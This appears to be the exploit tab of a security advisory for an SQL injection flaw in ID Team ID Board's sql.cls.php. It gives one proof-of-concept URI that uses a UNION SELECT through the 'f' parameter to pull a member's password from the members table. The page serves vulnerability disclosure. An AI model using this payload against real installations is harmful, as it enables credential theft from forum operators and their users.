• info
• discussion
• exploit
• solution
• references

ID Team ID Board SQL.CLS.PHP SQL Injection Vulnerability

No exploit is required.

The following proof of concept URI is available:
http://www.example.com/index.php?site=warn&f=1%20WHERE%200=1%20UNION%20SELECT%20mem_pw%20as%20post_topic_name%20FROM%20members%20WHERE%20mem_id=1/*&0&warn=0